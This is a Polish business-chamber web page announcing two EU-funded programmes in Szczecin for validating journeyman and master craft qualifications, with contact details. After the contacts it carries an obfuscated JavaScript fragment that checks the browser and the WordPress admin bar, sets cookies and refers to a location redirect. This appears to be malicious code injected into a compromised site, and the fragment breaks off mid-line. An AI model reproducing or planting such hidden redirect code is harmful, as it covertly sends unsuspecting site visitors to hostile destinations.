Informacja o realizacji projektów skierowanych do przedsiębiorców, osób chcących podnieść swoje kwalifikacje. | Północna Izba Gospodarcza w Koszalinie

Izba Rzemieślnicza MiŚP w Szczecinie, realizuje dwa projekty dofinansowane z środków UE w ramach Działania: 8.6. Wsparcie szkół i placówek prowadzących kształcenie zawodowe oraz uczniów uczestniczących w kształceniu zawodowym i
osób dorosłych uczestniczących w pozaszkolnych formach kształcenia zawodowego Regionalny Program Operacyjny Województwa Zachodniopomorskiego 2014-2020:

1.Kompleksowy Program Walidacji i Certyfikacji efektów uczenia się prowadzący do zdobycia kwalifikacji ZAWODOWYCH CZELADNIKA I MISTRZA W 12 ZAWODACH RZEMIEŚLNICZYCH?

2.Zostań Rzemieślnikiem  – nowe umiejętności i kwalifikacje zawodowe mistrza i czeladnika w 10 rynkowych zawodach kluczowych dla Regionalnych i Inteligentnych Specjalizacji Woj. Zach-Pom.

W wymienionych projektach można bezpłatnie potwierdzić swoje kwalifikacje i uzyskać świadectwo czeladnika lub dyplom mistrza.

Osoby do kontaktu w sprawie projektów: Agnieszka Greś-Szypka, tel: 91/422 22 78 lub a.gres@irszczecin.pl lub Dorota Miśkiewicz, tel: 661 063 290 d.miskiewicz@irszczecin.pl

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m